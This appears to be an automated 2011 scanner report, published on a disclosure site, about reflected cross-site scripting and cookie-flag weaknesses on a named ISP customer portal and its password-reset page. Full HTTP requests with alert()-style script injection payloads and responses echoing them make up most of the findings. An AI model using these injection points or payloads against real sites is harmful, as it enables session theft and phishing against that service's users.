XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, my.covad.com

Report generated by XSS.CX at Tue Aug 16 09:22:18 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in my.covad.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. https://my.covad.com/ [name of an arbitrarily supplied request parameter]

1.2. https://my.covad.com/customercare/displayLoginAUPage.do [name of an arbitrarily supplied request parameter]

1.3. https://my.covad.com/customercare/resetPassword2.do [name of an arbitrarily supplied request parameter]

1.4. https://my.covad.com/customercare/resetPassword2.do [userName parameter]

1.5. https://my.covad.com/customercare/resetPassword2.do [userName parameter]

1.6. https://my.covad.com/customercare/resetPassword2.do [userName parameter]

1.7. https://my.covad.com/customercare/resetPassword2.do [userName parameter]

2. SSL cookie without secure flag set

2.1. https://my.covad.com/customercare/images/logoMegaPath_and_siteDef.png

2.2. https://my.covad.com/customercare/images/spacer.gif

2.3. https://my.covad.com/customercare/scripts/coremetrics/cmdatatagutils.js

2.4. https://my.covad.com/customercare/scripts/coremetrics/v40/eluminate.js

2.5. https://my.covad.com/customercare/scripts/frame/global.js

2.6. https://my.covad.com/customercare/scripts/localAreaCommon.js

2.7. https://my.covad.com/customercare/scripts/localAreaValidator.js

2.8. https://my.covad.com/customercare/scripts/progressbar.js

2.9. https://my.covad.com/customercare/scripts/tabs.js

2.10. https://my.covad.com/customercare/scripts/wz_tooltip.js

2.11. https://my.covad.com/customercare/styles/login.css

2.12. https://my.covad.com/customercare/styles/stylesheet.css

2.13. https://my.covad.com/customercare/styles/tabs.css

3. Session token in URL

4. SSL certificate

5. Cookie without HttpOnly flag set

5.1. https://my.covad.com/customercare/images/logoMegaPath_and_siteDef.png

5.2. https://my.covad.com/customercare/images/spacer.gif

5.3. https://my.covad.com/customercare/scripts/coremetrics/cmdatatagutils.js

5.4. https://my.covad.com/customercare/scripts/coremetrics/v40/eluminate.js

5.5. https://my.covad.com/customercare/scripts/frame/global.js

5.6. https://my.covad.com/customercare/scripts/localAreaCommon.js

5.7. https://my.covad.com/customercare/scripts/localAreaValidator.js

5.8. https://my.covad.com/customercare/scripts/progressbar.js

5.9. https://my.covad.com/customercare/scripts/tabs.js

5.10. https://my.covad.com/customercare/scripts/wz_tooltip.js

5.11. https://my.covad.com/customercare/styles/login.css

5.12. https://my.covad.com/customercare/styles/stylesheet.css

5.13. https://my.covad.com/customercare/styles/tabs.css

6. Password field with autocomplete enabled

7. Email addresses disclosed

8. Cacheable HTTPS response

8.1. https://my.covad.com/customercare/displayLoginAUPage.do

8.2. https://my.covad.com/customercare/resetPassword.do

8.3. https://my.covad.com/customercare/resetPassword2.do

9. HTML does not specify charset

9.1. https://my.covad.com/customercare/displayLoginAUPage.do

9.2. https://my.covad.com/customercare/resetPassword.do

9.3. https://my.covad.com/customercare/resetPassword2.do



1. Cross-site scripting (reflected)  next
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://my.covad.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.covad.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0e5f'-alert(1)-'69ae746300b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e0e5f'-alert(1)-'69ae746300b=1 HTTP/1.1
Host: my.covad.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 13705


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...
<script language="javascript1.2" type="text/javascript">                        cmSetProduction();                        cmCreatePageviewTag('WEB-INF/jsp/layout/SmartBaseLayout.jsp?e0e5f'-alert(1)-'69ae746300b=1','My Covad Account', null);            </script>
...[SNIP]...

1.2. https://my.covad.com/customercare/displayLoginAUPage.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/displayLoginAUPage.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dec0b'-alert(1)-'091866184d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/displayLoginAUPage.do?dec0b'-alert(1)-'091866184d3=1 HTTP/1.1
Host: my.covad.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 13705


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...
<script language="javascript1.2" type="text/javascript">                        cmSetProduction();                        cmCreatePageviewTag('WEB-INF/jsp/layout/SmartBaseLayout.jsp?dec0b'-alert(1)-'091866184d3=1','My Covad Account', null);            </script>
...[SNIP]...

1.3. https://my.covad.com/customercare/resetPassword2.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/resetPassword2.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5ce4'-alert(1)-'77dce677165 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/resetPassword2.do?userName=xss.cx%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7&e5ce4'-alert(1)-'77dce677165=1 HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=CD138306B1011AFF4B5BED381AC99DD7; PL-PROD-Host-Id=1032; o_q=firsturl:https%3A//my.covad.com/customercare/resetPassword2.do%3FuserName%3D37ed6%2522%253E%253Cscript%253Ealert%28%2522XSS%2522%29%253C/script%253E3973456a9da204a7&urlcache:https%3A//my.covad.com/customercare/resetPassword2.do%3FuserName%3D37ed6%2522%253E%253Cscript%253Ealert%28%2522XSS%2522%29%253C/script%253E3973456a9da204a7&SrcID:0&referrer:http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&sourceid:0

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:20:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 10088


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...
1.2" type="text/javascript">                        cmSetProduction();                        cmCreatePageviewTag('WEB-INF/jsp/layout/SmartBaseLayout.jsp?userName=xss.cx%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7&e5ce4'-alert(1)-'77dce677165=1','My Covad Account', null);            </script>
...[SNIP]...

1.4. https://my.covad.com/customercare/resetPassword2.do [userName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/resetPassword2.do

Issue detail

The value of the userName request parameter is copied into the HTML document as plain text between tags. The payload 15517<script>alert(1)</script>61099258411 was submitted in the userName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customercare/resetPassword2.do?userName=xss.cx%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a715517<script>alert(1)</script>61099258411 HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=CD138306B1011AFF4B5BED381AC99DD7; PL-PROD-Host-Id=1032; o_q=firsturl:https%3A//my.covad.com/customercare/resetPassword2.do%3FuserName%3D37ed6%2522%253E%253Cscript%253Ealert%28%2522XSS%2522%29%253C/script%253E3973456a9da204a7&urlcache:https%3A//my.covad.com/customercare/resetPassword2.do%3FuserName%3D37ed6%2522%253E%253Cscript%253Ealert%28%2522XSS%2522%29%253C/script%253E3973456a9da204a7&SrcID:0&referrer:http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&sourceid:0

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:20:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 10139


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...
</script>3973456a9da204a715517<script>alert(1)</script>61099258411">
...[SNIP]...

1.5. https://my.covad.com/customercare/resetPassword2.do [userName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/resetPassword2.do

Issue detail

The value of the userName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95e48"><script>alert(1)</script>8f866a6e030 was submitted in the userName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customercare/resetPassword2.do?userName=95e48"><script>alert(1)</script>8f866a6e030 HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=CD138306B1011AFF4B5BED381AC99DD7; PL-PROD-Host-Id=1032; o_q=firsturl:https%3A//my.covad.com/customercare/resetPassword2.do%3FuserName%3D37ed6%2522%253E%253Cscript%253Ealert%28%2522XSS%2522%29%253C/script%253E3973456a9da204a7&urlcache:https%3A//my.covad.com/customercare/resetPassword2.do%3FuserName%3D37ed6%2522%253E%253Cscript%253Ealert%28%2522XSS%2522%29%253C/script%253E3973456a9da204a7&SrcID:0&referrer:http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&sourceid:0

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:20:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 10021


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...
<input name="userName" type="TEXT" MAXLENGTH=20 SIZE=25 value="95e48"><script>alert(1)</script>8f866a6e030">
...[SNIP]...

1.6. https://my.covad.com/customercare/resetPassword2.do [userName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/resetPassword2.do

Issue detail

The value of the userName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0d00'-alert(1)-'91c6353961d was submitted in the userName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/resetPassword2.do?userName=xss.cx%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7d0d00'-alert(1)-'91c6353961d HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: JSESSIONID=CD138306B1011AFF4B5BED381AC99DD7; PL-PROD-Host-Id=1032; o_q=firsturl:https%3A//my.covad.com/customercare/resetPassword2.do%3FuserName%3D37ed6%2522%253E%253Cscript%253Ealert%28%2522XSS%2522%29%253C/script%253E3973456a9da204a7&urlcache:https%3A//my.covad.com/customercare/resetPassword2.do%3FuserName%3D37ed6%2522%253E%253Cscript%253Ealert%28%2522XSS%2522%29%253C/script%253E3973456a9da204a7&SrcID:0&referrer:http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&sourceid:0

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:20:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 10113


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...
t1.2" type="text/javascript">                        cmSetProduction();                        cmCreatePageviewTag('WEB-INF/jsp/layout/SmartBaseLayout.jsp?userName=xss.cx%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7d0d00'-alert(1)-'91c6353961d','My Covad Account', null);            </script>
...[SNIP]...

1.7. https://my.covad.com/customercare/resetPassword2.do [userName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://my.covad.com
Path:   /customercare/resetPassword2.do

Issue detail

The value of the userName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ed6"><script>alert(1)</script>3973456a9da204a7 was submitted in the userName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /customercare/resetPassword2.do?userName=37ed6"><script>alert(1)</script>3973456a9da204a7 HTTP/1.1
Host: my.covad.com
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword.do;jsessionid=948E1DD4127CB6D261FE965929A88359
Cache-Control: max-age=0
Origin: https://my.covad.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=948E1DD4127CB6D261FE965929A88359; PL-PROD-Host-Id=1030; cmTPSet=Y; CoreID6=60520090478713135077429&ci=90239903; o_q=firsturl:https%3A//my.covad.com/customercare/displayLoginAUPage.do&urlcache:https%3A//my.covad.com/customercare/resetPassword.do%3Bjsessionid%3D948E1DD4127CB6D261FE965929A88359&SrcID:0&referrer:&sourceid:0; 90239903_clogin=l=1313507742&v=7&e=1313509551015; 90239903_clogin=l=1313507742&v=7&e=1313509553424; cmRS=&t1=1313507751010&t2=1313507751064&t3=1313507753423&t4=1313507749986&fti=1313507753423&fn=changePasswordForm%3A0%3B&ac=0:S&fd=0%3A1%3A%3B&uer=&fu=/customercare/resetPassword2.do&pi=WEB-INF/jsp/layout/SmartBaseLayout.jsp&ho=data.coremetrics.com/eluminate%3F&ci=90239903&cjen=1

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:15:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 10031


<HTML>
<HEAD>

    <title>My MegaPath Account</title>

   
               <link href="styles/stylesheet.css" rel="stylesheet" type="text/css">
   <link href="styles/tabs.css" rel="stylesheet"
...[SNIP]...
<input name="userName" type="TEXT" MAXLENGTH=20 SIZE=25 value="37ed6"><script>alert(1)</script>3973456a9da204a7">
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 13 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://my.covad.com/customercare/images/logoMegaPath_and_siteDef.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/images/logoMegaPath_and_siteDef.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/images/logoMegaPath_and_siteDef.png HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"8053-1313052556000"
Last-Modified: Thu, 11 Aug 2011 08:49:16 GMT
Content-Type: image/png
Content-Length: 8053
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=CD138306B1011AFF4B5BED381AC99DD7; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

.PNG
.
...IHDR.......9.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx..]    .\U.=U.]=O.     .. ...A.B0. _eh@.
.a9"....w\.p.......L.yN ..s02..h.....N.].?..~...W...NB.w.:...p.P.........d2.Zh...%,..
...[SNIP]...

2.2. https://my.covad.com/customercare/images/spacer.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/images/spacer.gif HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"43-1313052552000"
Last-Modified: Thu, 11 Aug 2011 08:49:12 GMT
Content-Type: image/gif
Content-Length: 43
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=97CDCD5DBCAE013E0DC2F78770290B41; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

GIF89a.............!.......,...........D..;

2.3. https://my.covad.com/customercare/scripts/coremetrics/cmdatatagutils.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/coremetrics/cmdatatagutils.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/coremetrics/cmdatatagutils.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"21594-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/javascript
Content-Length: 21594
Set-Cookie: PL-PROD-Host-Id=1030; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=B23A24C348E5BA34071D52BF925F19D7; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<!--
/*
* cmdatatagutils.js
* $Id: cmdatatagutils - 8591580 - 90239903 - 051509.txt 124873 2009-07-22 18:46:13Z jbowser $
* $Revision: 124873 $
*
* Version 4.1.0
*
* Coremetrics Tag v4.0, 8/7/
...[SNIP]...

2.4. https://my.covad.com/customercare/scripts/coremetrics/v40/eluminate.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/coremetrics/v40/eluminate.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/coremetrics/v40/eluminate.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:26 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"31901-1313052558000"
Last-Modified: Thu, 11 Aug 2011 08:49:18 GMT
Content-Type: text/javascript
Content-Length: 31901
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=34125376321BAD36D2F0EF22208BA113; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*Copyright 2000-2005,Coremetrics 4.2.9 $Revision:125424 $*/if(!cGB){var cGB=true;if(!cm_ClientID){var cm_ClientID="99999999";}if(!cm_HOST){var cm_HOST="test.coremetrics.com/cm?";}if(!cm_ClientTS){var
...[SNIP]...

2.5. https://my.covad.com/customercare/scripts/frame/global.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.covad.com
Path:   /customercare/scripts/frame/global.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customercare/scripts/frame/global.js HTTP/1.1
Host: my.covad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://my.covad.com/customercare/resetPassword2.do?userName=37ed6%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E3973456a9da204a7

Response

HTTP/1.1 200 OK
Date: Tue, 16 Aug 2011 15:19:25 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"14616-1313052554000"
Last-Modified: Thu, 11 Aug 2011 08:49:14 GMT
Content-Type: text/javascript
Content-Length: 14616
Set-Cookie: PL-PROD-Host-Id=1032; path=/; domain=.covad.com
Set-Cookie: JSESSIONID=08415A48A55B83E022A89FB81F5047CB; Path=/customercare
Via: 1.1 my.covad.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*global Constants*/
var SEARCH_FORM_NAME = "searchData";
var SEARCH_FORM_DEFAULT_RADIO = "ACCOUNTNUMBER";
var SWITCH_VISP_FORM_NAME = "switchVISP";
var WEBSITE0S_FORM = "WebsiteOSLoginData";

/* Set
...[SNIP]...

